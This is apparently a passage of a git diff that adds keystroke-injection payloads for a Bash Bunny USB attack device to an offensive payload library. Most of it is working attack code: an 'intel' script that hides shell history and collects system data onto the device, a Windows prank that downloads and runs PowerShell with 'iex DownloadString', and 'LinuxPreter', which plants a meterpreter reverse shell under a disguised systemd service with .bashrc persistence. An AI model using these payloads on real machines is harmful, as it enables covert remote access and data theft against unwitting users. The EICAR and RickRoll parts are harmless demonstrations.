-qa >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +snap list >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +flatpak list --app >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "******************************************" >> $mntt/loot/intel +echo "Directory Structure:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +find * / >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "******************************************" >> $mntt/loot/intel diff --git a/payloads/library/exfiltration/intel/payload.txt b/payloads/library/exfiltration/intel/payload.txt new file mode 100644 index 00000000..17965860 --- /dev/null +++ b/payloads/library/exfiltration/intel/payload.txt @@ -0,0 +1,56 @@ +# Title: intel +# Description: intel(intelligence) payload collects detailed information of victims machine. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration +# Target: GNU/Linux operating systems. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/intel.sh +Q ENTER +Q STRING /tmp/./intel.sh +Q ENTER +Q DELAY 25000 +Q STRING rm /tmp/intel.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/poc/MacOS_EICAR/eicar.sh b/payloads/library/poc/MacOS_EICAR/eicar.sh new file mode 100644 index 00000000..ddc8fd66 --- /dev/null +++ b/payloads/library/poc/MacOS_EICAR/eicar.sh @@ -0,0 +1,2 @@ +#!/bin/bash +echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt \ No newline at end of file diff --git a/payloads/library/poc/MacOS_EICAR/payload.txt b/payloads/library/poc/MacOS_EICAR/payload.txt new file mode 100644 index 00000000..e9df2733 --- /dev/null +++ b/payloads/library/poc/MacOS_EICAR/payload.txt @@ -0,0 +1,32 @@ +#!/bin/bash +# Title: MacOS_EICAR +# Description: Bad USB PoC for MacOS. +# Author: Ciph3rtxt +# Category: PoC +# Target: MacOS +# Attackmodes: HID STORAGE + +# Setup +LED R +ATTACKMODE HID STORAGE +GET SWITCH_POSITION +path=/Volumes/BashBunny/payloads/$SWITCH_POSITION + + +# Execute Attack +LED R +DELAY 200 +RUN OSX terminal +Q DELAY 2000 +Q STRING cd +Q ENTER +Q DELAY 200 +Q STRING chmod a+x $path/eicar.sh +Q ENTER +Q DELAY 200 +Q STRING $path/eicar.sh +Q ENTER +Q DELAY 200 + +# Complete +LED G \ No newline at end of file diff --git a/payloads/library/poc/MacOS_EICAR/readme.md b/payloads/library/poc/MacOS_EICAR/readme.md new file mode 100644 index 00000000..790607ce --- /dev/null +++ b/payloads/library/poc/MacOS_EICAR/readme.md @@ -0,0 +1,19 @@ +# MacOS EICAR PoC + +Author: Ciph3rtxt + + +## Category: + +PoC + +## Description: + +Generates EICAR file to simulate USB (physical access) malware attack. + +## Status: + +|LED|STATUS| +|-|-| +|Red|Attack| +|Green|Complete| \ No newline at end of file diff --git a/payloads/library/prank/UnifiedRickRoll/payload.txt b/payloads/library/prank/UnifiedRickRoll/payload.txt index c59d5611..d43fd529 100755 --- a/payloads/library/prank/UnifiedRickRoll/payload.txt +++ b/payloads/library/prank/UnifiedRickRoll/payload.txt @@ -13,7 +13,7 @@ Q DELAY 1000 Q GUI n Q DELAY 1000 -Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown +Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while [ \$hi = \'0\' ]\; do if [ \$ho = $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown # close up shop Q DELAY 1000 diff --git a/payloads/library/prank/Win_PoSh_HiThere/payload.txt b/payloads/library/prank/Win_PoSh_HiThere/payload.txt new file mode 100644 index 00000000..a5127923 --- /dev/null +++ b/payloads/library/prank/Win_PoSh_HiThere/payload.txt @@ -0,0 +1,37 @@ +#!/bin/bash +# Title: Hi There +# Description: Creates a hidden link file that override the ctrl+c functionality. +# So, when the user press ctrl+c it lunches the first sign-in animation. +# Author: Cribbit +# Version: 1.0 +# Category: Pranks +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID +# Props: v3ded, Hexacorn and Audibleblink (Python Server) + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 200 +RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\"" +QUACK DELAY 500 +QUACK CTRL c +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSh_HiThere/readme.md b/payloads/library/prank/Win_PoSh_HiThere/readme.md new file mode 100644 index 00000000..40b76c48 --- /dev/null +++ b/payloads/library/prank/Win_PoSh_HiThere/readme.md @@ -0,0 +1,33 @@ +# Hi There +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 (Powershell 5.1+) +- Category: Pranks +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run +- Props: v3ded, Hexacorn and Audibleblink (Python Server) + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Creates a hidden link file that override the ctrl+c functionality. +So, when the user press ctrl+c it lunches the first sign-in animation. + +## Notes +to kill the animation, you need to open task manger and look for "First Sign-in Animation". +For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it. + +## More information + + + + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSh_HiThere/s b/payloads/library/prank/Win_PoSh_HiThere/s new file mode 100644 index 00000000..2641a532 --- /dev/null +++ b/payloads/library/prank/Win_PoSh_HiThere/s @@ -0,0 +1,19 @@ +$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk" +$wshell = New-Object -ComObject Wscript.Shell +$shortcut = $wshell.CreateShortcut($path) + +$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70" + +$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe" +$shortcut.Arguments = "/RunFirstLogonAnim" +$shortcut.WorkingDirectory = "C:" +$shortcut.HotKey = "CTRL+C" +$shortcut.Description = "Contain very important information" + +$shortcut.WindowStyle = 7 + # 7 = Minimized window + # 3 = Maximized window + # 1 = Normal window +$shortcut.Save() + +(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks) \ No newline at end of file diff --git a/payloads/library/remote_access/LinuxPreter/README.md b/payloads/library/remote_access/LinuxPreter/README.md new file mode 100644 index 00000000..0a0933a9 --- /dev/null +++ b/payloads/library/remote_access/LinuxPreter/README.md @@ -0,0 +1,36 @@ +## About: +* Title: LinuxPreter +* Description: Injects meterpreter payload and makes it persistent. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Remote Access +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell. + +### Workflow: +* Keeping tracks clear by preventing storage of history. +* Fetching BashBunny's block device and mounting it. +* Transfering payload script and payload itself. +* Deleting scripts from victims machine and unmounting bunny. + +### Create Meterpreter payload: +* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o sysHandle.bin``` +* NOTE: Only change IP address and Port number in the above command. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payload/switch1/ | +| payload.sh | /payload/ | +| sysHandle.bin | /tools/ | + + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh new file mode 100644 index 00000000..cfecd2cf --- /dev/null +++ b/payloads/library/remote_access/LinuxPreter/payload.sh @@ -0,0 +1,12 @@ +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +mkdir /var/tmp/.system +cp -r $mntt/tools/sysHandle.bin /var/tmp/.system +chmod +x /var/tmp/.system/sysHandle.bin +mkdir -p ~/.config/systemd/user/ +systemctl --user start systemPer.service +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service + +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/remote_access/LinuxPreter/payload.txt b/payloads/library/remote_access/LinuxPreter/payload.txt new file mode 100644 index 00000000..34118624 --- /dev/null +++ b/payloads/library/remote_access/LinuxPreter/payload.txt @@ -0,0 +1,56 @@ +# Title: LinuxPreter +# Description: Injects meterpreter payload and makes it persistent. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Remote Access +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 1000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH